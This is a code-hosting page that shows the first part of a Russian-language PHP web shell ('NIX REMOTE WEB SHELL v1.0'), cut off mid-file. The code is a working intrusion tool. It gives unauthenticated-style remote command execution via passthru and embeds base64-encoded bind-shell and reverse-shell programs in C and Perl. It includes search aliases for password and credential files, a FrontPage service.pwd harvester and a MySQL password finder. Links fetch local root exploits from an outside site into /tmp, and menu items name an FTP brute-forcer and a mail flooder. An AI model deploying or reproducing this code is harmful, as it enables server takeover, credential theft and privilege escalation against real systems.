PageRenderTime 69ms CodeModel.GetById 32ms RepoModel.GetById 0ms app.codeStats 1ms

/xakep-shells/PHP/nixrem.php.php.txt

https://github.com/chickenlove/webshell
Plain Text | 1772 lines | 1602 code | 170 blank | 0 comment | 0 complexity | d9e10daa08c908b3431cb30e74b7e6b4 MD5 | raw file
Possible License(s): AGPL-1.0, GPL-2.0
  1. <?php
  2. #########################################################
  3. # NIX REMOTE WEB SHELL #
  4. # Coded by DreAmeRz Ver 1.0 #
  5. # ORIGINAL E-MAIL IS: dreamerz@mail.ru #
  6. #
  7. #########################################################
  8. $name="1"; // логин пользователя
  9. $pass="1"; // пароль пользователя
  10. if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
  11. {
  12. header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
  13. header("HTTP/1.0 401 Unauthorized");
  14. exit("Access Denied");
  15. }
  16. ?>
  17. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
  18. <html>
  19. <head>
  20. <title>NIX REMOTE WEB-SHELL v.1.0</title>
  21. <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
  22. <meta http-equiv="pragma" content="no-cache">
  23. <meta http-equiv="Content-Language" content="en,ru">
  24. <META name="autor" content="DreAmeRz (www.Ru24-Team.NET)">
  25. <style type="text/css">
  26. BODY, TD, TR {
  27. text-decoration: none;
  28. font-family: Verdana;
  29. font-size: 8pt;
  30. scrollbar-face-color: #FFFFFF;
  31. scrollbar-shadow-color:#000000 ;
  32. scrollbar-highlight-color:#FFFFFF;
  33. scrollbar-3dlight-color: #000000;
  34. scrollbar-darkshadow-color:#FFFFFF ;
  35. scrollbar-track-color: #FFFFFF;
  36. scrollbar-arrow-color: #000000;
  37. }
  38. input, textarea, select {
  39. font-family: Verdana;
  40. font-size: 10px;
  41. color: black;
  42. background-color: red;
  43. border: solid 1px;
  44. border-color: black
  45. }
  46. UNKNOWN {
  47. COLOR: black;
  48. TEXT-DECORATION: none
  49. }
  50. A:link {COLOR:black; TEXT-DECORATION: none}
  51. A:visited { COLOR:black; TEXT-DECORATION: none}
  52. A:active {COLOR:black; TEXT-DECORATION: none}
  53. A:hover {color:blue;TEXT-DECORATION: none}
  54. </STYLE>
  55. </HEAD>
  56. <BODY bgcolor="#fffcf9" text="#000000">
  57. <P align=center>[ <A href="javascript:history.next(+1)">Вперед ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
  58. v.1.0<FONT color=#linux size=1> Stable </FONT> [ <A href="javascript:history.back(-1)">Назад ]</A>[ <A href="?ac=about" title='Что умеет скрипт...'>О скрипте ]</a><BR>
  59. <A href="?ac=info" title='Узнай все об этой системе!'>[ Информация о системе</A> ][ <A href="?ac=navigation" title='Удобная графическая навигация. Просмотр, редактирование...'>Навигация</A> ][ <A href="?ac=backconnect" title='Установка backconnect и обычного бекдора '>Установка
  60. бекдора</A> ][ <A href="?ac=eval" title='Создай свой скрипт на php прямо здесь :)'>PHP-код</A> ][ <A href="?ac=upload" title='Загрузка одного файла, масcовая загрузка, загрузка файлов с удаленного компьютера!'>Загрузка файлов</A> ][ <A href="?ac=shell" title='bash shell, альясы...'>Исполнение
  61. команд ]</A> <br><A href="?ac=sql" title='Работа с MySQL'> [ MySQL</A> ]<A href="?ac=sendmail" title='Отправь е-mail отсюда!'>[ Отправка письма</A> ][ <A href="?ac=mailfluder" title='Тебя кто-то достал? Тогда тебе сюда...'>Маилфлудер</A>
  62. ][ <A href="?ac=tools" title='Кодировщики/декодировщики md5, des, sha1, base64... '>Инструменты ]</A>[ <A href="?ac=ps" title='Отображает список процессов на сервере и позволяет их убивать!'>Демоны</A> ][ <A href="?ac=art" title='Альтернативные методы взлома...'>Альтернативные методы</A> ][ <A href="?ac=exploits" title='id=root gid=0 uid=0'>/root</A> ][ <A href="?ac=selfremover" title='Надоел этот сервер? Тогда можно удалить и шелл...'>Удалить шелл</A> ]</P>
  63. <?php
  64. if (ini_get('register_globals') != '1') {
  65. if (!empty($HTTP_POST_VARS))
  66. extract($HTTP_POST_VARS);
  67. if (!empty($HTTP_GET_VARS))
  68. extract($HTTP_GET_VARS);
  69. if (!empty($HTTP_SERVER_VARS))
  70. extract($HTTP_SERVER_VARS);
  71. }
  72. Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
  73. set_magic_quotes_runtime(0);
  74. set_time_limit(0); // убрать ограничение по времени
  75. ignore_user_abort(1); // игнорировать разрыв связи с браузером
  76. error_reporting(0);
  77. $self = $_SERVER['PHP_SELF'];
  78. $docr = $_SERVER['DOCUMENT_ROOT'];
  79. $sern = $_SERVER['SERVER_NAME'];
  80. if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
  81. $aliases=array(
  82. '------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
  83. 'поиск на сервере всех файлов со suid-битом' => 'find / -type f -perm -04000 -ls',
  84. 'поиск на сервере всех файлов со sgid-битом' => 'find / -type f -perm -02000 -ls',
  85. 'поиск в текущей директории всех файлов со sgid-битом' => 'find . -type f -perm -02000 -ls',
  86. 'поиск на сервере файлов config' => 'find / -type f -name "config*"',
  87. 'поиск на сервере файлов admin' => 'find / -type f -name "admin*"',
  88. 'поиск в текущей директории файлов config' => 'find . -type f -name "config*"',
  89. 'поиск в текущей директории файлов pass' => 'find . -type f -name "pass*"',
  90. 'поиск на сервере всех директорий и файлов, открытых для записи' => 'find / -perm -2 -ls',
  91. 'поиск в текущей директории всех директорий и файлов, открытых для записи' => 'find . -perm -2 -ls',
  92. 'поиск в текущей директории файлов service.pwd' => 'find . -type f -name service.pwd',
  93. 'поиск на сервере файлов service.pwd' => 'find / -type f -name service.pwd',
  94. 'поиск на сервере файлов .htpasswd' => 'find / -type f -name .htpasswd',
  95. 'поиск в текущей директории файлов .htpasswd' => 'find . -type f -name .htpasswd',
  96. 'поиск всех файлов .bash_history' => 'find / -type f -name .bash_history',
  97. 'поиск в текущей директории файлов .bash_history' => 'find . -type f -name .bash_history',
  98. 'поиск всех файлов .fetchmailrc' => 'find / -type f -name .fetchmailrc',
  99. 'поиск в текущей директории файлов .fetchmailrc' => 'find . -type f -name .fetchmailrc',
  100. 'вывод списка атрибутов файлов на файловой системе ext2fs' => 'lsattr -va',
  101. 'просмотр открытых портов' => 'netstat -an | grep -i listen',
  102. 'поиск всех php-файлов со словом password' =>'find / -name *.php | xargs grep -li password',
  103. 'поиск папок с модом 777' =>'find / -type d -perm 0777',
  104. 'Определение версии ОС' =>'sysctl -a | grep version',
  105. 'Определение версии ядра' =>'cat /proc/version',
  106. 'Просмотр syslog.conf' =>'cat /etc/syslog.conf',
  107. 'Просмотр Message of the day' =>'cat /etc/motd',
  108. 'Просмотр hosts' =>'cat /etc/hosts',
  109. 'Версия дистрибутива 1' =>'cat /etc/issue.net',
  110. 'Версия дистрибутива 2' =>'cat /etc/*-realise',
  111. 'Показать все процесы' =>'ps auxw',
  112. 'Процессы текущего пользователя' =>'ps ux',
  113. 'Поиск httpd.conf' =>'locate httpd.conf');
  114. /* Port bind source */
  115. $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
  116. jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
  117. ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
  118. 0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
  119. mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
  120. KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
  121. hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
  122. OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
  123. rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
  124. kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
  125. 7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
  126. wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
  127. 6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
  128. hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
  129. pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
  130. sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
  131. 0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
  132. lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
  133. 9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
  134. pDQpyZXR1cm4gMDsNCn0=";
  135. $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
  136. AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
  137. NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
  138. QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
  139. pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
  140. JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
  141. 0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
  142. FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
  143. YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
  144. NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
  145. 9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
  146. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
  147. HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
  148. DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
  149. HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
  150. CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
  151. GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
  152. WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
  153. iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
  154. VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
  155. FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  156. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
  157. KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
  158. pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
  159. ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
  160. uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
  161. 9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
  162. zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
  163. QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
  164. sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
  165. pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
  166. zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
  167. sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
  168. if(isset($uploadphp))
  169. {
  170. $socket=fsockopen($iphost,$loadport); //connect
  171. fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //request
  172. while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
  173. unset($buffer); }
  174. while(!feof($socket)) $buffer.=fread($socket, 1024);
  175. $file_size=strlen($buffer);
  176. $f=fopen($loadnewname,"wb+");
  177. fwrite($f, $buffer, $file_size);
  178. echo "Размер загруженного файла: $file_size <b><br><br>" ;
  179. }
  180. if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
  181. elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
  182. else {$ac = "navigation";}
  183. switch($ac) {
  184. // Shell
  185. case "shell":
  186. echo "<SCRIPT LANGUAGE='JavaScript'>
  187. <!--
  188. function pi(str) {
  189. document.command.cmd.value = str;
  190. document.command.cmd.focus();
  191. }
  192. //-->
  193. </SCRIPT>";
  194. /* command execute */
  195. if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
  196. if (($_POST['alias']) AND ($_POST['alias']!==""))
  197. {
  198. foreach ($aliases as $alias_name=>$alias_cmd) {
  199. if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
  200. }
  201. }
  202. echo "<font face=Verdana size=-2>Выполненная команда: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
  203. echo "<b>";
  204. echo "<div align=center><textarea name=report cols=145 rows=20>";
  205. echo "".passthru($_POST['cmd'])."";
  206. echo "</textarea></div>";
  207. echo "</b>";
  208. ?>
  209. </td></tr>
  210. <tr><b><div align=center>:: Выполнение команд на сервере ::</div></b></font></td></tr>
  211. <tr><td height=23>
  212. <TR>
  213. <CENTER>
  214. <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
  215. <TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
  216. <TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
  217. <TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
  218. <TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
  219. <TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
  220. <TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
  221. <TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
  222. <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
  223. <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
  224. <TD><A HREF="JavaScript:pi('perl ');" class=fcom>perl</A> |</TD>
  225. <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
  226. <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
  227. <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
  228. <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
  229. </CENTER>
  230. </TR>
  231. <?
  232. /* command execute form */
  233. echo "<form name=command method=post>";
  234. echo "<b>Выполнить команду</b>";
  235. echo "<input type=text name=cmd size=85><br>";
  236. echo "<b>Рабочая директория &nbsp;</b>";
  237. if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
  238. else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
  239. echo "<input type=submit name=submit value=Выполнить>";
  240. echo "</form>";
  241. /* aliases form */
  242. echo "<form name=aliases method=POST>";
  243. echo "<font face=Verdana size=-2>";
  244. echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Выберите алиас<font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
  245. echo "<select name=alias>";
  246. foreach ($aliases as $alias_name=>$alias_cmd)
  247. {
  248. echo "<option>$alias_name</option>";
  249. }
  250. echo "</select>";
  251. if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
  252. else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
  253. echo "&nbsp;&nbsp;<input type=submit name=submit value=Выполнить>";
  254. echo "</font>";
  255. echo "</form>";
  256. break;
  257. case "art":
  258. echo "<a href='?ac=frontpage'><b>FrontPage Exploit by Nitrex</b></a><br>
  259. Эксплойт для FrontPage. Собирает читаемые .htpassword файлы по всему серверу. Позволяет создать нехилую базу всех сайтов в виде логин:пароль от хостера, то есть пароли к FrontPage подходят к FTP и другим сервисам сервера. Рассшифровка производится с помощью John The Ripper (Standart/DES).<br><br>
  260. <a href='?ac=dbexploit'><b>MySQL Find Config Exploit by DreAmeRz</b></a><br>
  261. Эксплоит, позволяющий облегчить поиск паролей к базе данных. Производится поиск файлов с упоминанием ряда строк, указывающих на коннект к MySQL. Также возможно совпадение паролей с другими сервисами сервера. Пароли в большенстве случаев или вовсе не зашифрованы, или зашифрованы обратимым алгоритмом. Проанализировав файлы, указанные эксплоитом, вы быстро найдете пароль к MySQL.<br><br>
  262. <a href='?ac=ftp'><b>FTP Brut by xoce</b></a><br>
  263. Полноценный брутфорсер, работающий по методу подстановки паролей, которые берет из файла. Файл генерируется сам, вы только указываете число паролей и... все - перебор начинается!!! С помощью данного брутфорсера вы сможете подобрать пароль к любому хостингу без проблем! Чтобы было что перебирать, была добавлена база паролей, которая генерируется на лету (не пишите большие цифры в количестве паролей, так как это серьезная нагрузка на сервер! 10000 вполне хватит).<br><br>
  264. <a href='?ac=ftppass'><b>FTP login:login Brut by Terabyte</b></a><br>
  265. Эксплоит позволяет перебрать аккаунт на FTP на связку login:login. Чем больше юзеров в /etc/passwd, тем больше вероятность удачной работы эксплоита.<br><br>
  266. <a href='?ac=shell'><b>Некоторые другие мини-эксплоиты приведены здесь в альясах.</b></a><br>";
  267. break;
  268. case "frontpage":
  269. $p=getenv("DOCUMENT_ROOT");
  270. if(exec("cat /etc/passwd")){
  271. $ex=explode("/", $p);
  272. $do_login=substr($p,0,strpos($p,$ex[2]));
  273. $next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
  274. exec("cat /etc/passwd", $passwd);
  275. for($i=0; $i<=count($passwd); $i++) {
  276. $xz=explode(":", $passwd[$i]);
  277. $file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd";
  278. if(exec("cat ".$file)){
  279. exec("cat ".$file,$open);
  280. $a=$open[count($open)-1];
  281. $fr=strpos($a, ":");
  282. $open1=substr($a, $fr);
  283. if($xz[4]=='') {
  284. $file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess";
  285. Unset($domain);
  286. exec("cat ".$file1,$domain);
  287. $domain1=explode(" ",$domain[8]);
  288. $xz[4]=$domain1[1];
  289. }
  290. echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."<br>";
  291. } }
  292. }
  293. elseif(is_file("/etc/passwd")){
  294. $ex=explode("/", $p);
  295. $passwd="/etc/passwd";
  296. echo "Путь:&nbsp".$p."<br>";
  297. $do_login=substr($p,0,strpos($p,$ex[2]));
  298. $next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
  299. if(is_file($passwd)) {
  300. $open=fopen($passwd,"r");
  301. while (!feof($open)) {
  302. $str=fgets($open, 100);
  303. $mas=explode(":", $str);
  304. $file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd";
  305. if(is_file($file)) {
  306. echo $mas[0];
  307. $open1=fopen($file, "r");
  308. $str1=fread($open1,filesize($file));
  309. fclose($open1);
  310. $fr=strpos($str1, ":");
  311. $str2=substr($str1, $fr);
  312. $str2=rtrim($str2);
  313. //
  314. if($mas[4]=='') {
  315. $file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess";
  316. $open2=fopen($file1,"r");
  317. $domain=fread($open2,filesize($file1));
  318. fclose($open2);
  319. $domain1=substr($domain,106,110);
  320. $domain2=explode("AuthUserFile",$domain1);
  321. $mas[4]=$domain2[0];
  322. }
  323. //
  324. echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."<br>";
  325. }
  326. }
  327. fclose($open);
  328. }
  329. }
  330. else{
  331. echo "С пассом облом :(((";
  332. }
  333. break;
  334. case "dbexploit":
  335. echo "<PRE>";
  336. echo "<b>В файле присутствует функция mysql_connect: </b><br>";
  337. exec("find / -name *.php | xargs grep -li mysql_connect");
  338. exec("find / -name *.inc | xargs grep -li mysql_connect");
  339. exec("find / -name *.inc.php | xargs grep -li mysql_connect");
  340. echo "<b>В файле присутствует функция mysql_select_db: </b><br>";
  341. exec("find / -name *.php | xargs grep -li mysql_select_db");
  342. exec("find / -name *.inc | xargs grep -li mysql_select_db");
  343. exec("find / -name *.inc.php | xargs grep -li mysql_select_db");
  344. echo "<b>В файле присутствует упоминание пароля: </b><br>";
  345. exec("find / -name *.php | xargs grep -li $password");
  346. exec("find / -name *.inc | xargs grep -li $password");
  347. exec("find / -name *.inc.php | xargs grep -li $password");
  348. exec("find / -name *.php | xargs grep -li $pass");
  349. exec("find / -name *.inc | xargs grep -li $pass");
  350. exec("find / -name *.inc.php | xargs grep -li $pass");
  351. echo "<b>В файле присутствует слово localhost: </b><br>";
  352. exec("find / -name *.php | xargs grep -li localhost");
  353. exec("find / -name *.inc | xargs grep -li localhost");
  354. exec("find / -name *.inc.php | xargs grep -li localhost");
  355. echo "</PRE>";
  356. break;
  357. // список процессов
  358. case "ps":
  359. echo "<b>Процессы в системе:</b><br>";
  360. echo "<br>";
  361. if ($pid)
  362. {
  363. if (!$sig) {$sig = 9;}
  364. echo "Отправление команды ".$sig." to #".$pid."... ";
  365. $ret = posix_kill($pid,$sig);
  366. if ($ret) {echo "Все, процесс убит, аминь";}
  367. else {echo "ОШИБКА! ".htmlspecialchars($sig).", в процессе #".htmlspecialchars($pid).".";}
  368. }
  369. $ret = `ps -aux`;
  370. if (!$ret) {echo "Невозможно отобразить список процессов! Видно, злой админ запретил ps";}
  371. else
  372. {
  373. $ret = htmlspecialchars($ret);
  374. while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
  375. $stack = explode("\n",$ret);
  376. $head = explode(" ",$stack[0]);
  377. unset($stack[0]);
  378. if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
  379. if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
  380. $k = $ps_aux_sort[0];
  381. if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
  382. else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
  383. for($i=0;$i<count($head);$i++)
  384. {
  385. if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
  386. }
  387. $prcs = array();
  388. foreach ($stack as $line)
  389. {
  390. if (!empty($line))
  391. {
  392. echo "<tr>";
  393. $line = explode(" ",$line);
  394. $line[10] = join(" ",array_slice($line,10,count($line)));
  395. $line = array_slice($line,0,11);
  396. $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  397. $prcs[] = $line;
  398. echo "</tr>";
  399. }
  400. }
  401. $head[$k] = "<b>".$head[$k]."</b>".$y;
  402. $head[] = "<b>ACTION</b>";
  403. $v = $ps_aux_sort[0];
  404. usort($prcs,"tabsort");
  405. if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
  406. $tab = array();
  407. $tab[] = $head;
  408. $tab = array_merge($tab,$prcs);
  409. echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  410. foreach($tab as $k)
  411. {
  412. echo "<tr>";
  413. foreach($k as $v) {echo "<td>".$v."</td>";}
  414. echo "</tr>";
  415. }
  416. echo "</table>";
  417. }
  418. break;
  419. // exploits for root...
  420. case "exploits":
  421. // thanks to xoce
  422. $public_site = "http://hackru.info/adm/exploits/public_exploits";
  423. $private_site = "http://hackru.info/adm/exploits/private_exploits";
  424. echo"Этот раздел создан по ряду причин. Во-первых, уже надоело искать одни и теже эксплоиты, во-вторых - компилирование и исправление сорцов под конкретную платформу уже тоже не приносит удовольствия. Все эксплоиты скомпилированы и настроены. Самому компилировать было влом, поэтому воспользовался готовыми :) Выражаю благодарность xoce (hackru.info)<br><br>
  425. <a href='?ac=upload&file3=$public_site/m&file2=/tmp'>Local ROOT for linux 2.6.20 - mremap (./m)</a><br>
  426. <a href='?ac=upload&file3=$public_site/p&file2=/tmp'>Local ROOT for linux 2.6.20 - ptrace (./p)</a><br>
  427. <a href='?ac=upload&file3=$private_site/brk&file2=/tmp'>BRK - Local Root Unix 2.4.*(./brk)</a><br>
  428. <a href='?ac=upload&file3=$private_site/sortrace&file2=/tmp'>Traceroute v1.4a5 exploit by sorbo (./sortrace)</a><br>
  429. <a href='?ac=upload&file3=$private_site/root&file2=/tmp'>Local Root Unix 2.4.* (./root)</a><br>
  430. <a href='?ac=upload&file3=$private_site/sxp&file2=/tmp'>Sendmail 8.11.x exploit localroot (./sxp)</a><br>
  431. <a href='?ac=upload&file3=$private_site/ptrace_kmod&file2=/tmp'>Local Root Unix 2.4.* (./ptrace_kmod)</a><br>
  432. <a href='?ac=upload&file3=$private_site/mr1_a&file2=/tmp'>Local Root Unix 2.4.* (./mr1_a)</a><br><br>";
  433. echo "Использование: заходите в /tmp из bash шелла и запускайте файлы запуска.<br>
  434. Пример: cd /tmp; ./m - все, эксплоит запустится, и если все ok, то вы получите права root'a!<br>
  435. Если здесь не оказалось подходящего эксплоита, то посетите <a href=http://www.web-hack.ru/exploits/>www.web-hack.ru/exploits/</a> и <a href=http://security.nnov.ru>security.nnov.ru</a>.";
  436. break;
  437. case "damp":
  438. if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
  439. if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
  440. $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
  441. if($db)
  442. {
